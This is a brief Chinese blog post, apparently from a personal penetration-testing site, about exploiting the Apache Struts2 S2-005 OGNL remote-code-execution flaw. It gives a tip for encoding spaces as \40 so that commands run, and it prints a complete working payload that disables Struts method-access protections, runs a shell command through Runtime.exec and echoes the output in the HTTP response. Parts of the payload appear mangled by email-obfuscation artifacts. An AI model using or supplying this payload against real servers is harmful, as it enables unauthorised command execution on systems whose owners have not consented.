记一次struts2-005
首页 > web安全 > 渗透测试    作者:webbaozi   2018年3月26日 22:48 星期一   热度:263°   百度已收录  
时间:2018-3-26 22:48   热度:263° 

如图:

QQ图片20180326225251.jpg

执行id参数可以成功执行,但是当命令中含有空格时执行命令就会失败。

然后调试发现把命令中的空格换成\40即可成功执行命令

这里附上s2_005的命令:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43mycmd\75\'whoami\40就是空格\'')(d))&(h)(('\43myret\[email protected]@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\[email protected]@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))

二维码加载中...
本文作者:webbaozi      文章标题: 记一次struts2-005
本文地址:http://www.webbaozi.com/stcs/90.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1